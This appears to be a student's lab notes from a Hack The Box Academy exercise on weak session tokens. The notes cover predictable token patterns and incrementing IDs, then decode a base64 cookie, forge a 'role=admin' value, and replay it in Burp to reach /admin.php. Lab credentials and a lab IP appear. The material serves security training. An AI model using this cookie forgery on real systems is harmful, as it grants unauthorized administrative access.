IDENTIFICATION

#sufficient length, but consists of hardcoded prepended and appended values
2c0c58b27c71a2ec5bf2b4 b6e8 92b9f9
2c0c58b27c71a2ec5bf2b4 5460 92b9f9
2c0c58b27c71a2ec5bf2b4 97f5 92b9f9
2c0c58b27c71a2ec5bf2b4 8bcf 92b9f9
2c0c58b27c71a2ec5bf2b4 735e 92b9f9
* The session tokens consist of the static string 2c0c58b27c71a2ec5bf2b4 followed by four random characters and the static string 92b9f9

#incrementing session identifier
141233
141234
141237
141238
141240
* this makes enumeration of all past and future sessions trivia

#base64 encoded
dXNlcj1odGItc3RkbnQ7cm9sZT11c2Vy

root@oco:~$ echo -n dXNlcj1odGItc3RkbnQ7cm9sZT11c2Vy | base64 -d
 user=htb-stdnt;role=user
 * this cookie contains information about the user and the role tied to the session. However, there is no security measure in place that prevents tampering with the data
 
root@oco:~$ echo -n 'user=htb-stdnt;role=admin' | base64
 dXNlcj1odGItc3RkbnQ7cm9sZT1hZG1pbg==
 
BURP > Repeater
 Request
 ...
  GET /admin.php HTTP/1.1
  Host: session.htb
  Cookie: session=dXNlcj1odGItc3RkbnQ7cm9sZT1hZG1pbg%3d%3d
  
 Response
 ...
  HTTP/1.1 200 OK
  ...

#hex-encoded
Set-Cookie: session=757365723d6874622d7374646e743b726f6c653d75736572

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 username field: htb-stdnt
 password field: AcademyStudent!
 * submit the expected user input

BURP > Repeater
 Request
 ...
  POST /index.php HTTP/1.1
  Host: session.htb
  Origin: http://83.136.254.158:52415
  Content-Type: application/x-www-form-urlencoded
  Referer: http://83.136.254.158:52415/index.php

  username=htb-stdnt&password=AcademyStudent%21
  
 Response
 ...
  HTTP/1.1 302 Found
  Date: Thu, 26 Dec 2024 00:29:27 GMT
  Server: Apache/2.4.59 (Debian)
  Set-Cookie: session=757365723d6874622d7374646e743b726f6c653d75736572
  Location: /admin.php
  ...
  
root@oco:~$ echo -n 757365723d6874622d7374646e743b726f6c653d75736572 | xxd -r -p
 user=htb-stdnt;role=user